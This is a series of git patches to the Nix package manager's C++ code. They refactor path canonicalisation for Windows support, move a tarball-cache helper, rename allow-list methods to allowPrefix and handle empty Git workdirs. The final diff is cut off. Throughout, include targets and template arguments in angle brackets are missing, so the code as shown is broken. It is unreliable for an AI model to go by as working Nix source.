     return result;
 }
 
+ref getTarballCache()
+{
+    static auto repoDir = std::filesystem::path(getCacheDir()) / "nix" / "tarball-cache";
+
+    return GitRepo::openRepo(repoDir, true, true);
+}
+
 }
diff --git a/src/libfetchers/git-utils.hh b/src/libfetchers/git-utils.hh
index 029d39741..5f68d26a7 100644
--- a/src/libfetchers/git-utils.hh
+++ b/src/libfetchers/git-utils.hh
@@ -95,4 +95,6 @@ struct GitRepo
         const std::vector & publicKeys) = 0;
 };
 
+ref getTarballCache();
+
 }
diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc
index 8b3e6ff20..e6fbece13 100644
--- a/src/libfetchers/github.cc
+++ b/src/libfetchers/github.cc
@@ -10,7 +10,6 @@
 #include "tarball.hh"
 #include "tarfile.hh"
 #include "git-utils.hh"
-#include "tarball-cache.hh"
 
 #include 
 #include 
@@ -193,6 +192,12 @@ struct GitArchiveInputScheme : InputScheme
 
     virtual DownloadUrl getDownloadUrl(const Input & input) const = 0;
 
+    struct TarballInfo
+    {
+        Hash treeHash;
+        time_t lastModified;
+    };
+
     std::pair downloadArchive(ref store, Input input) const
     {
         if (!maybeGetStrAttr(input.attrs, "ref")) input.attrs.insert_or_assign("ref", "HEAD");
diff --git a/src/libfetchers/tarball-cache.cc b/src/libfetchers/tarball-cache.cc
deleted file mode 100644
index bb2c51973..000000000
--- a/src/libfetchers/tarball-cache.cc
+++ /dev/null
@@ -1,13 +0,0 @@
-#include "tarball-cache.hh"
-#include "users.hh"
-
-namespace nix::fetchers {
-
-ref getTarballCache()
-{
-    static auto repoDir = std::filesystem::path(getCacheDir()) / "nix" / "tarball-cache";
-
-    return GitRepo::openRepo(repoDir, true, true);
-}
-
-}
diff --git a/src/libfetchers/tarball-cache.hh b/src/libfetchers/tarball-cache.hh
deleted file mode 100644
index e1517038b..000000000
--- a/src/libfetchers/tarball-cache.hh
+++ /dev/null
@@ -1,17 +0,0 @@
-#pragma once
-///@file
-
-#include "ref.hh"
-#include "git-utils.hh"
-
-namespace nix::fetchers {
-
-struct TarballInfo
-{
-    Hash treeHash;
-    time_t lastModified;
-};
-
-ref getTarballCache();
-
-}

From e27b7e04bf38c1fdf342d6e15b2c003ca9b92cb1 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Fri, 16 Feb 2024 08:45:15 -0500
Subject: [PATCH 478/654] Add note about this being a temp solution

---
 src/libutil/source-path.hh | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/src/libutil/source-path.hh b/src/libutil/source-path.hh
index b4cfa9ce8..4542a2bac 100644
--- a/src/libutil/source-path.hh
+++ b/src/libutil/source-path.hh
@@ -11,6 +11,10 @@
 
 namespace nix {
 
+/**
+ * Note there is a decent chance this type soon goes away because the problem is solved another way.
+ * See the discussion in https://github.com/NixOS/nix/pull/9985.
+ */
 enum class SymlinkResolution {
     /**
      * Resolve symlinks in the ancestors only.
@@ -121,6 +125,9 @@ struct SourcePath
     /**
      * Resolve any symlinks in this `SourcePath` according to the
      * given resolution mode.
+     *
+     * @param mode might only be a temporary solution for this. 
+     * See the discussion in https://github.com/NixOS/nix/pull/9985.
      */
     SourcePath resolveSymlinks(
         SymlinkResolution mode = SymlinkResolution::Full) const;

From d17e1d9737f68d5f77e9c0f9bfa56da8a4f63816 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Sat, 13 Jan 2024 01:11:49 -0500
Subject: [PATCH 479/654] Purify `CanonPath`

The core `CanonPath` constructors were using `absPath`, but `absPath` in
some situations does IO which is not appropriate. It turns out that
these constructors avoided those situations, and thus were pure, but it
was far from obvious this was the case.

To remedy the situation, abstract the core algorithm from `canonPath` to
use separately in `CanonPath` without any IO. No we know by-construction
that those constructors are pure.

That leaves `CanonPath::fromCWD` as the only operation which uses IO /
is impure. Add docs on it, and `CanonPath` as a whole, explaining the
situation.

This is also necessary to support Windows paths on windows without
messing up `CanonPath`. But, I think it is good even without that.

Co-authored-by: Eelco Dolstra 
Co-authored-by: Robert Hensing 
---
 src/libutil/canon-path.cc        | 15 ++++--
 src/libutil/canon-path.hh        | 18 +++++--
 src/libutil/file-path-impl.hh    | 81 ++++++++++++++++++++++++++++++++
 src/libutil/file-system.cc       | 80 ++++++++++++-------------------
 tests/unit/libutil/canon-path.cc | 18 +++++++
 5 files changed, 155 insertions(+), 57 deletions(-)
 create mode 100644 src/libutil/file-path-impl.hh

diff --git a/src/libutil/canon-path.cc b/src/libutil/canon-path.cc
index 1223ba33c..fcd53862b 100644
--- a/src/libutil/canon-path.cc
+++ b/src/libutil/canon-path.cc
@@ -1,16 +1,25 @@
 #include "canon-path.hh"
-#include "file-system.hh"
+#include "util.hh"
+#include "file-path-impl.hh"
 
 namespace nix {
 
 CanonPath CanonPath::root = CanonPath("/");
 
+static std::string absPathPure(std::string_view path)
+{
+    return canonPathInner(path, [](auto &, auto &){});
+}
+
 CanonPath::CanonPath(std::string_view raw)
-    : path(absPath(raw, "/"))
+    : path(absPathPure(concatStrings("/", raw)))
 { }
 
 CanonPath::CanonPath(std::string_view raw, const CanonPath & root)
-    : path(absPath(raw, root.abs()))
+    : path(absPathPure(
+        raw.size() > 0 && raw[0] == '/'
+            ? raw
+            : concatStrings(root.abs(), "/", raw)))
 { }
 
 CanonPath::CanonPath(const std::vector & elems)
diff --git a/src/libutil/canon-path.hh b/src/libutil/canon-path.hh
index 2f8ff381e..8f5a1c279 100644
--- a/src/libutil/canon-path.hh
+++ b/src/libutil/canon-path.hh
@@ -21,9 +21,21 @@ namespace nix {
  *
  * - There are no components equal to '.' or '..'.
  *
- * Note that the path does not need to correspond to an actually
- * existing path, and there is no guarantee that symlinks are
- * resolved.
+ * `CanonPath` are "virtual" Nix paths for abstract file system objects;
+ * they are always Unix-style paths, regardless of what OS Nix is
+ * running on. The `/` root doesn't denote the ambient host file system
+ * root, but some virtual FS root.
+ *
+ * @note It might be useful to compare `openat(some_fd, "foo/bar")` on
+ * Unix. `"foo/bar"` is a relative path because an absolute path would
+ * "override" the `some_fd` directory file descriptor and escape to the
+ * "system root". Conversely, Nix's abstract file operations *never* escape the
+ * designated virtual file system (i.e. `SourceAccessor` or
+ * `ParseSink`), so `CanonPath` does not need an absolute/relative
+ * distinction.
+ *
+ * @note The path does not need to correspond to an actually existing
+ * path, and the path may or may not have unresolved symlinks.
  */
 class CanonPath
 {
diff --git a/src/libutil/file-path-impl.hh b/src/libutil/file-path-impl.hh
new file mode 100644
index 000000000..39159c7c2
--- /dev/null
+++ b/src/libutil/file-path-impl.hh
@@ -0,0 +1,81 @@
+#pragma once
+/**
+ * @file
+ *
+ * Pure (no IO) infrastructure just for defining other path types;
+ * should not be used directly outside of utilities.
+ */
+#include 
+#include 
+
+namespace nix {
+
+/**
+ * Core pure path canonicalization algorithm.
+ *
+ * @param hookComponent
+ *   A callback which is passed two arguments,
+ *   references to
+ *
+ *   1. the result so far
+ *
+ *   2. the remaining path to resolve
+ *
+ *   This is a chance to modify those two paths in arbitrary way, e.g. if
+ *   "result" points to a symlink.
+ */
+typename std::string canonPathInner(
+    std::string_view remaining,
+    auto && hookComponent)
+{
+    assert(remaining != "");
+
+    std::string result;
+    result.reserve(256);
+
+    while (true) {
+
+        /* Skip slashes. */
+        while (!remaining.empty() && remaining[0] == '/')
+            remaining.remove_prefix(1);
+
+        if (remaining.empty()) break;
+
+        auto nextComp = ({
+            auto nextPathSep = remaining.find('/');
+            nextPathSep == remaining.npos ? remaining : remaining.substr(0, nextPathSep);
+        });
+
+        /* Ignore `.'. */
+        if (nextComp == ".")
+            remaining.remove_prefix(1);
+
+        /* If `..', delete the last component. */
+        else if (nextComp == "..")
+        {
+            if (!result.empty()) result.erase(result.rfind('/'));
+            remaining.remove_prefix(2);
+        }
+
+        /* Normal component; copy it. */
+        else {
+            result += '/';
+            if (const auto slash = remaining.find('/'); slash == result.npos) {
+                result += remaining;
+                remaining = {};
+            } else {
+                result += remaining.substr(0, slash);
+                remaining = remaining.substr(slash);
+            }
+
+            hookComponent(result, remaining);
+        }
+    }
+
+    if (result.empty())
+        result = "/";
+
+    return result;
+}
+
+}
diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc
index 9fa1f62df..3c019a9ed 100644
--- a/src/libutil/file-system.cc
+++ b/src/libutil/file-system.cc
@@ -1,5 +1,6 @@
 #include "environment-variables.hh"
 #include "file-system.hh"
+#include "file-path-impl.hh"
 #include "signals.hh"
 #include "finally.hh"
 #include "serialise.hh"
@@ -21,11 +22,18 @@ namespace fs = std::filesystem;
 
 namespace nix {
 
+/** Treat the string as possibly an absolute path, by inspecting the start of it. Return whether it was probably intended to be absolute. */
+static bool isAbsolute(PathView path)
+{
+    return !path.empty() && path[0] == '/';
+}
+
+
 Path absPath(PathView path, std::optional dir, bool resolveSymlinks)
 {
     std::string scratch;
 
-    if (path.empty() || path[0] != '/') {
+    if (!isAbsolute(path)) {
         // In this case we need to call `canonPath` on a newly-created
         // string. We set `scratch` to that string first, and then set
         // `path` to `scratch`. This ensures the newly-created string
@@ -58,69 +66,39 @@ Path canonPath(PathView path, bool resolveSymlinks)
 {
     assert(path != "");
 
-    std::string s;
-    s.reserve(256);
-
-    if (path[0] != '/')
+    if (!isAbsolute(path))
         throw Error("not an absolute path: '%1%'", path);
 
+    /* This just exists because we cannot set the target of `remaining`
+       (the callback parameter) directly to a newly-constructed string,
+       since it is `std::string_view`. */
     std::string temp;
 
     /* Count the number of times we follow a symlink and stop at some
        arbitrary (but high) limit to prevent infinite loops. */
     unsigned int followCount = 0, maxFollow = 1024;
 
-    while (1) {
-
-        /* Skip slashes. */
-        while (!path.empty() && path[0] == '/') path.remove_prefix(1);
-        if (path.empty()) break;
-
-        /* Ignore `.'. */
-        if (path == "." || path.substr(0, 2) == "./")
-            path.remove_prefix(1);
-
-        /* If `..', delete the last component. */
-        else if (path == ".." || path.substr(0, 3) == "../")
-        {
-            if (!s.empty()) s.erase(s.rfind('/'));
-            path.remove_prefix(2);
-        }
-
-        /* Normal component; copy it. */
-        else {
-            s += '/';
-            if (const auto slash = path.find('/'); slash == path.npos) {
-                s += path;
-                path = {};
-            } else {
-                s += path.substr(0, slash);
-                path = path.substr(slash);
-            }
-
-            /* If s points to a symlink, resolve it and continue from there */
-            if (resolveSymlinks && isLink(s)) {
+    return canonPathInner(
+        path,
+        [&followCount, &temp, maxFollow, resolveSymlinks]
+        (std::string & result, std::string_view & remaining) {
+            if (resolveSymlinks && isLink(result)) {
                 if (++followCount >= maxFollow)
-                    throw Error("infinite symlink recursion in path '%1%'", path);
-                temp = concatStrings(readLink(s), path);
-                path = temp;
-                if (!temp.empty() && temp[0] == '/') {
-                    s.clear();  /* restart for symlinks pointing to absolute path */
+                    throw Error("infinite symlink recursion in path '%0%'", remaining);
+                remaining = (temp = concatStrings(readLink(result), remaining));
+                if (isAbsolute(remaining)) {
+                    /* restart for symlinks pointing to absolute path */
+                    result.clear();
                 } else {
-                    s = dirOf(s);
-                    if (s == "/") {  // we don’t want trailing slashes here, which dirOf only produces if s = /
-                        s.clear();
+                    result = dirOf(result);
+                    if (result == "/") {
+                        /* we don’t want trailing slashes here, which `dirOf`
+                           only produces if `result = /` */
+                        result.clear();
                     }
                 }
             }
-        }
-    }
-
-    if (s.empty()) {
-        s = "/";
-    }
-
-    return s;
+        });
 }
 
 
diff --git a/tests/unit/libutil/canon-path.cc b/tests/unit/libutil/canon-path.cc
index bf11abe3e..7f91308af 100644
--- a/tests/unit/libutil/canon-path.cc
+++ b/tests/unit/libutil/canon-path.cc
@@ -41,6 +41,24 @@ namespace nix {
         }
     }
 
+    TEST(CanonPath, from_existing) {
+        CanonPath p0("foo//bar/");
+        {
+            CanonPath p("/baz//quux/", p0);
+            ASSERT_EQ(p.abs(), "/baz/quux");
+            ASSERT_EQ(p.rel(), "baz/quux");
+            ASSERT_EQ(*p.baseName(), "quux");
+            ASSERT_EQ(*p.dirOf(), "/baz");
+        }
+        {
+            CanonPath p("baz//quux/", p0);
+            ASSERT_EQ(p.abs(), "/foo/bar/baz/quux");
+            ASSERT_EQ(p.rel(), "foo/bar/baz/quux");
+            ASSERT_EQ(*p.baseName(), "quux");
+            ASSERT_EQ(*p.dirOf(), "/foo/bar/baz");
+        }
+    }
+
     TEST(CanonPath, pop) {
         CanonPath p("foo/bar/x");
         ASSERT_EQ(p.abs(), "/foo/bar/x");

From 4531585275254f13dae1ff61434e15865a1e796a Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Mon, 29 Jan 2024 17:16:18 -0500
Subject: [PATCH 480/654] Factor out the Unix-specific parts of
 `canonPathInner`

This prepares the code to also support Windows paths in the next commit.
---
 src/libutil/canon-path.cc     |  2 +-
 src/libutil/file-path-impl.hh | 52 +++++++++++++++++++++++++++++------
 src/libutil/file-system.cc    |  2 +-
 3 files changed, 45 insertions(+), 11 deletions(-)

diff --git a/src/libutil/canon-path.cc b/src/libutil/canon-path.cc
index fcd53862b..27f048697 100644
--- a/src/libutil/canon-path.cc
+++ b/src/libutil/canon-path.cc
@@ -8,7 +8,7 @@ CanonPath CanonPath::root = CanonPath("/");
 
 static std::string absPathPure(std::string_view path)
 {
-    return canonPathInner(path, [](auto &, auto &){});
+    return canonPathInner(path, [](auto &, auto &){});
 }
 
 CanonPath::CanonPath(std::string_view raw)
diff --git a/src/libutil/file-path-impl.hh b/src/libutil/file-path-impl.hh
index 39159c7c2..941d433e0 100644
--- a/src/libutil/file-path-impl.hh
+++ b/src/libutil/file-path-impl.hh
@@ -10,6 +10,39 @@
 
 namespace nix {
 
+/**
+ * Unix-style path primives.
+ *
+ * Nix'result own "logical" paths are always Unix-style. So this is always
+ * used for that, and additionally used for native paths on Unix.
+ */
+struct UnixPathTrait
+{
+    using CharT = char;
+
+    using String = std::string;
+
+    using StringView = std::string_view;
+
+    constexpr static char preferredSep = '/';
+
+    static inline bool isPathSep(char c)
+    {
+        return c == '/';
+    }
+
+    static inline size_t findPathSep(StringView path, size_t from = 0)
+    {
+        return path.find('/', from);
+    }
+
+    static inline size_t rfindPathSep(StringView path, size_t from = StringView::npos)
+    {
+        return path.rfind('/', from);
+    }
+};
+
+
 /**
  * Core pure path canonicalization algorithm.
  *
@@ -24,25 +57,26 @@ namespace nix {
  *   This is a chance to modify those two paths in arbitrary way, e.g. if
  *   "result" points to a symlink.
  */
-typename std::string canonPathInner(
-    std::string_view remaining,
+template
+typename PathDict::String canonPathInner(
+    typename PathDict::StringView remaining,
     auto && hookComponent)
 {
     assert(remaining != "");
 
-    std::string result;
+    typename PathDict::String result;
     result.reserve(256);
 
     while (true) {
 
         /* Skip slashes. */
-        while (!remaining.empty() && remaining[0] == '/')
+        while (!remaining.empty() && PathDict::isPathSep(remaining[0]))
             remaining.remove_prefix(1);
 
         if (remaining.empty()) break;
 
         auto nextComp = ({
-            auto nextPathSep = remaining.find('/');
+            auto nextPathSep = PathDict::findPathSep(remaining);
             nextPathSep == remaining.npos ? remaining : remaining.substr(0, nextPathSep);
         });
 
@@ -53,14 +87,14 @@ typename std::string canonPathInner(
         /* If `..', delete the last component. */
         else if (nextComp == "..")
         {
-            if (!result.empty()) result.erase(result.rfind('/'));
+            if (!result.empty()) result.erase(PathDict::rfindPathSep(result));
             remaining.remove_prefix(2);
         }
 
         /* Normal component; copy it. */
         else {
-            result += '/';
-            if (const auto slash = remaining.find('/'); slash == result.npos) {
+            result += PathDict::preferredSep;
+            if (const auto slash = PathDict::findPathSep(remaining); slash == result.npos) {
                 result += remaining;
                 remaining = {};
             } else {
@@ -73,7 +107,7 @@ typename std::string canonPathInner(
     }
 
     if (result.empty())
-        result = "/";
+        result = typename PathDict::String { PathDict::preferredSep };
 
     return result;
 }
diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc
index 3c019a9ed..ff83bc4ea 100644
--- a/src/libutil/file-system.cc
+++ b/src/libutil/file-system.cc
@@ -78,7 +78,7 @@ Path canonPath(PathView path, bool resolveSymlinks)
        arbitrary (but high) limit to prevent infinite loops. */
     unsigned int followCount = 0, maxFollow = 1024;
 
-    return canonPathInner(
+    return canonPathInner(
         path,
         [&followCount, &temp, maxFollow, resolveSymlinks]
         (std::string & result, std::string_view & remaining) {

From 319ec6f84accb7342160b856185402dcdebbaba9 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Sun, 14 Jan 2024 14:30:25 -0500
Subject: [PATCH 481/654] Support Windows paths in `canonPath` and `absPath`

`canonPath` and `absPath` work on native paths, and so should switch
between supporting Unix paths and Windows paths accordingly.

The templating is because `CanonPath`, which shares the implementation,
should always be Unix style. It is the pure "nix-native" path type for
virtual file operations --- it is part of Nix's "business logic", and
should not vary with the host OS accordingly.
---
 src/libutil/file-path-impl.hh | 61 +++++++++++++++++++++++++++++++++++
 src/libutil/file-system.cc    | 17 ++++++++--
 tests/unit/libutil/tests.cc   | 30 ++++++++++-------
 3 files changed, 94 insertions(+), 14 deletions(-)

diff --git a/src/libutil/file-path-impl.hh b/src/libutil/file-path-impl.hh
index 941d433e0..4c90150fd 100644
--- a/src/libutil/file-path-impl.hh
+++ b/src/libutil/file-path-impl.hh
@@ -43,6 +43,67 @@ struct UnixPathTrait
 };
 
 
+/**
+ * Windows-style path primitives.
+ *
+ * The character type is a parameter because while windows paths rightly
+ * work over UTF-16 (*) using `wchar_t`, at the current time we are
+ * often manipulating them converted to UTF-8 (*) using `char`.
+ *
+ * (Actually neither are guaranteed to be valid unicode; both are
+ * arbitrary non-0 8- or 16-bit bytes. But for charcters with specifical
+ * meaning like '/', '\\', ':', etc., we refer to an encoding scheme,
+ * and also for sake of UIs that display paths a text.)
+ */
+template
+struct WindowsPathTrait
+{
+    using CharT = CharT0;
+
+    using String = std::basic_string;
+
+    using StringView = std::basic_string_view;
+
+    constexpr static CharT preferredSep = '\\';
+
+    static inline bool isPathSep(CharT c)
+    {
+        return c == '/' || c == preferredSep;
+    }
+
+    static size_t findPathSep(StringView path, size_t from = 0)
+    {
+        size_t p1 = path.find('/', from);
+        size_t p2 = path.find(preferredSep, from);
+        return p1 == String::npos ? p2 :
+               p2 == String::npos ? p1 :
+               std::min(p1, p2);
+    }
+
+    static size_t rfindPathSep(StringView path, size_t from = String::npos)
+    {
+        size_t p1 = path.rfind('/', from);
+        size_t p2 = path.rfind(preferredSep, from);
+        return p1 == String::npos ? p2 :
+               p2 == String::npos ? p1 :
+               std::max(p1, p2);
+    }
+};
+
+
+/**
+ * @todo Revisit choice of `char` or `wchar_t` for `WindowsPathTrait`
+ * argument.
+ */
+using NativePathTrait =
+#ifdef _WIN32
+    WindowsPathTrait
+#else
+    UnixPathTrait
+#endif
+    ;
+
+
 /**
  * Core pure path canonicalization algorithm.
  *
diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc
index ff83bc4ea..b0a3f0797 100644
--- a/src/libutil/file-system.cc
+++ b/src/libutil/file-system.cc
@@ -22,10 +22,14 @@ namespace fs = std::filesystem;
 
 namespace nix {
 
-/** Treat the string as possibly an absolute path, by inspecting the start of it. Return whether it was probably intended to be absolute. */
+/**
+ * Treat the string as possibly an absolute path, by inspecting the
+ * start of it. Return whether it was probably intended to be
+ * absolute.
+ */
 static bool isAbsolute(PathView path)
 {
-    return !path.empty() && path[0] == '/';
+    return fs::path { path }.is_absolute();
 }
 
 
@@ -69,6 +73,9 @@ Path canonPath(PathView path, bool resolveSymlinks)
     if (!isAbsolute(path))
         throw Error("not an absolute path: '%1%'", path);
 
+    // For Windows
+    auto rootName = fs::path { path }.root_name();
+
     /* This just exists because we cannot set the target of `remaining`
        (the callback parameter) directly to a newly-constructed string,
        since it is `std::string_view`. */
@@ -78,7 +85,7 @@ Path canonPath(PathView path, bool resolveSymlinks)
        arbitrary (but high) limit to prevent infinite loops. */
     unsigned int followCount = 0, maxFollow = 1024;
 
-    return canonPathInner(
+    auto ret = canonPathInner(
         path,
         [&followCount, &temp, maxFollow, resolveSymlinks]
         (std::string & result, std::string_view & remaining) {
@@ -99,6 +106,10 @@ Path canonPath(PathView path, bool resolveSymlinks)
                 }
             }
         });
+
+    if (!rootName.empty())
+        ret = rootName.string() + std::move(ret);
+    return ret;
 }
 
 
diff --git a/tests/unit/libutil/tests.cc b/tests/unit/libutil/tests.cc
index 568f03f70..4406fd184 100644
--- a/tests/unit/libutil/tests.cc
+++ b/tests/unit/libutil/tests.cc
@@ -9,6 +9,14 @@
 
 #include 
 
+#ifdef _WIN32
+# define FS_SEP "\\"
+# define FS_ROOT "C:" FS_SEP // Need a mounted one, C drive is likely
+#else
+# define FS_SEP "/"
+# define FS_ROOT FS_SEP
+#endif
+
 namespace nix {
 
 /* ----------- tests for util.hh ------------------------------------------------*/
@@ -18,9 +26,9 @@ namespace nix {
      * --------------------------------------------------------------------------*/
 
     TEST(absPath, doesntChangeRoot) {
-        auto p = absPath("/");
+        auto p = absPath(FS_ROOT);
 
-        ASSERT_EQ(p, "/");
+        ASSERT_EQ(p, FS_ROOT);
     }
 
 
@@ -53,11 +61,11 @@ namespace nix {
 
 
     TEST(absPath, pathIsCanonicalised) {
-        auto path = "/some/path/with/trailing/dot/.";
+        auto path = FS_ROOT "some/path/with/trailing/dot/.";
         auto p1 = absPath(path);
         auto p2 = absPath(p1);
 
-        ASSERT_EQ(p1, "/some/path/with/trailing/dot");
+        ASSERT_EQ(p1, FS_ROOT "some" FS_SEP "path" FS_SEP "with" FS_SEP "trailing" FS_SEP "dot");
         ASSERT_EQ(p1, p2);
     }
 
@@ -66,24 +74,24 @@ namespace nix {
      * --------------------------------------------------------------------------*/
 
     TEST(canonPath, removesTrailingSlashes) {
-        auto path = "/this/is/a/path//";
+        auto path = FS_ROOT "this/is/a/path//";
         auto p = canonPath(path);
 
-        ASSERT_EQ(p, "/this/is/a/path");
+        ASSERT_EQ(p, FS_ROOT "this" FS_SEP "is" FS_SEP "a" FS_SEP "path");
     }
 
     TEST(canonPath, removesDots) {
-        auto path = "/this/./is/a/path/./";
+        auto path = FS_ROOT "this/./is/a/path/./";
         auto p = canonPath(path);
 
-        ASSERT_EQ(p, "/this/is/a/path");
+        ASSERT_EQ(p, FS_ROOT "this" FS_SEP "is" FS_SEP "a" FS_SEP "path");
     }
 
     TEST(canonPath, removesDots2) {
-        auto path = "/this/a/../is/a////path/foo/..";
+        auto path = FS_ROOT "this/a/../is/a////path/foo/..";
         auto p = canonPath(path);
 
-        ASSERT_EQ(p, "/this/is/a/path");
+        ASSERT_EQ(p, FS_ROOT "this" FS_SEP "is" FS_SEP "a" FS_SEP "path");
     }
 
     TEST(canonPath, requiresAbsolutePath) {
@@ -197,7 +205,7 @@ namespace nix {
      * --------------------------------------------------------------------------*/
 
     TEST(pathExists, rootExists) {
-        ASSERT_TRUE(pathExists("/"));
+        ASSERT_TRUE(pathExists(FS_ROOT));
     }
 
     TEST(pathExists, cwdExists) {

From 6162105675762a394603dbbf39cb1fa55065fec3 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Tue, 20 Feb 2024 10:28:44 +0100
Subject: [PATCH 482/654] Don't say "copying X to the store" in read-only mode

---
 src/libfetchers/fetch-to-store.cc | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/src/libfetchers/fetch-to-store.cc b/src/libfetchers/fetch-to-store.cc
index c27880662..f5c740266 100644
--- a/src/libfetchers/fetch-to-store.cc
+++ b/src/libfetchers/fetch-to-store.cc
@@ -33,12 +33,15 @@ StorePath fetchToStore(
     } else
         debug("source path '%s' is uncacheable", path);
 
-    Activity act(*logger, lvlChatty, actUnknown, fmt("copying '%s' to the store", path));
+    auto readOnly = settings.readOnlyMode;
+
+    Activity act(*logger, lvlChatty, actUnknown,
+        fmt(readOnly ? "hashing '%s'" : "copying '%s' to the store", path));
 
     auto filter2 = filter ? *filter : defaultPathFilter;
 
     auto storePath =
-        settings.readOnlyMode
+        readOnly
         ? store.computeStorePath(
             name, *path.accessor, path.path, method, HashAlgorithm::SHA256, {}, filter2).first
         : store.addToStore(

From d52d91fe7a349d24a83b8698b3d04874c9f52cd2 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Tue, 20 Feb 2024 11:21:28 +0100
Subject: [PATCH 483/654] AllowListInputAccessor: Clarify that the "allowed
 paths" are actually allowed prefixes

E.g. adding "/" will allow access to the root and *everything below it*.
---
 src/libexpr/eval.cc                         |  4 ++--
 src/libfetchers/filtering-input-accessor.cc | 16 ++++++++--------
 src/libfetchers/filtering-input-accessor.hh |  9 +++++----
 3 files changed, 15 insertions(+), 14 deletions(-)

diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index 6fc9df237..41b6f5c85 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -467,13 +467,13 @@ EvalState::~EvalState()
 void EvalState::allowPath(const Path & path)
 {
     if (auto rootFS2 = rootFS.dynamic_pointer_cast())
-        rootFS2->allowPath(CanonPath(path));
+        rootFS2->allowPrefix(CanonPath(path));
 }
 
 void EvalState::allowPath(const StorePath & storePath)
 {
     if (auto rootFS2 = rootFS.dynamic_pointer_cast())
-        rootFS2->allowPath(CanonPath(store->toRealPath(storePath)));
+        rootFS2->allowPrefix(CanonPath(store->toRealPath(storePath)));
 }
 
 void EvalState::allowAndSetStorePathString(const StorePath & storePath, Value & v)
diff --git a/src/libfetchers/filtering-input-accessor.cc b/src/libfetchers/filtering-input-accessor.cc
index 087a100af..32343abc4 100644
--- a/src/libfetchers/filtering-input-accessor.cc
+++ b/src/libfetchers/filtering-input-accessor.cc
@@ -51,33 +51,33 @@ void FilteringInputAccessor::checkAccess(const CanonPath & path)
 
 struct AllowListInputAccessorImpl : AllowListInputAccessor
 {
-    std::set allowedPaths;
+    std::set allowedPrefixes;
 
     AllowListInputAccessorImpl(
         ref next,
-        std::set && allowedPaths,
+        std::set && allowedPrefixes,
         MakeNotAllowedError && makeNotAllowedError)
         : AllowListInputAccessor(SourcePath(next), std::move(makeNotAllowedError))
-        , allowedPaths(std::move(allowedPaths))
+        , allowedPrefixes(std::move(allowedPrefixes))
     { }
 
     bool isAllowed(const CanonPath & path) override
     {
-        return path.isAllowed(allowedPaths);
+        return path.isAllowed(allowedPrefixes);
     }
 
-    void allowPath(CanonPath path) override
+    void allowPrefix(CanonPath prefix) override
     {
-        allowedPaths.insert(std::move(path));
+        allowedPrefixes.insert(std::move(prefix));
     }
 };
 
 ref AllowListInputAccessor::create(
     ref next,
-    std::set && allowedPaths,
+    std::set && allowedPrefixes,
     MakeNotAllowedError && makeNotAllowedError)
 {
-    return make_ref(next, std::move(allowedPaths), std::move(makeNotAllowedError));
+    return make_ref(next, std::move(allowedPrefixes), std::move(makeNotAllowedError));
 }
 
 bool CachingFilteringInputAccessor::isAllowed(const CanonPath & path)
diff --git a/src/libfetchers/filtering-input-accessor.hh b/src/libfetchers/filtering-input-accessor.hh
index 8a9b206ee..8111a72c5 100644
--- a/src/libfetchers/filtering-input-accessor.hh
+++ b/src/libfetchers/filtering-input-accessor.hh
@@ -54,18 +54,19 @@ struct FilteringInputAccessor : InputAccessor
 };
 
 /**
- * A wrapping `InputAccessor` that checks paths against an allow-list.
+ * A wrapping `InputAccessor` that checks paths against a set of
+ * allowed prefixes.
  */
 struct AllowListInputAccessor : public FilteringInputAccessor
 {
     /**
-     * Grant access to the specified path.
+     * Grant access to the specified prefix.
      */
-    virtual void allowPath(CanonPath path) = 0;
+    virtual void allowPrefix(CanonPath prefix) = 0;
 
     static ref create(
         ref next,
-        std::set && allowedPaths,
+        std::set && allowedPrefixes,
         MakeNotAllowedError && makeNotAllowedError);
 
     using FilteringInputAccessor::FilteringInputAccessor;

From 9e762454cf62d0d7a6259b560cc3e340f6f5ec6e Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Tue, 20 Feb 2024 11:40:02 +0100
Subject: [PATCH 484/654] Support empty Git repositories / workdirs

Fixes #10039.
---
 src/libfetchers/git-utils.cc             | 21 ++++++++++++--------
 src/libfetchers/git.cc                   |  8 ++++++--
 src/libfetchers/memory-input-accessor.cc |  6 ++++++
 src/libfetchers/memory-input-accessor.hh |  2 ++
 tests/functional/fetchGit.sh             | 25 ++++++++++++++++++++++++
 5 files changed, 52 insertions(+), 10 deletions(-)

diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc
index 4f034e9d4..037fcc365 100644
--- a/src/libfetchers/git-utils.cc
+++ b/src/libfetchers/git-utils.cc
@@ -2,6 +2,7 @@
 #include "fs-input-accessor.hh"
 #include "input-accessor.hh"
 #include "filtering-input-accessor.hh"
+#include "memory-input-accessor.hh"
 #include "cache.hh"
 #include "finally.hh"
 #include "processes.hh"
@@ -942,17 +943,21 @@ ref GitRepoImpl::getAccessor(const Hash & rev, bool exportIgnore)
 ref GitRepoImpl::getAccessor(const WorkdirInfo & wd, bool exportIgnore, MakeNotAllowedError makeNotAllowedError)
 {
     auto self = ref(shared_from_this());
+    /* In case of an empty workdir, return an empty in-memory tree. We
+       cannot use AllowListInputAccessor because it would return an
+       error for the root (and we can't add the root to the allow-list
+       since that would allow access to all its children). */
     ref fileAccessor =
-        AllowListInputAccessor::create(
-                makeFSInputAccessor(path),
-                std::set { wd.files },
-                std::move(makeNotAllowedError));
-    if (exportIgnore) {
+        wd.files.empty()
+        ? makeEmptyInputAccessor()
+        : AllowListInputAccessor::create(
+            makeFSInputAccessor(path),
+            std::set { wd.files },
+            std::move(makeNotAllowedError)).cast();
+    if (exportIgnore)
         return make_ref(self, fileAccessor, std::nullopt);
-    }
-    else {
+    else
         return fileAccessor;
-    }
 }
 
 ref GitRepoImpl::getFileSystemObjectSink()
diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc
index bef945d54..97ef35b51 100644
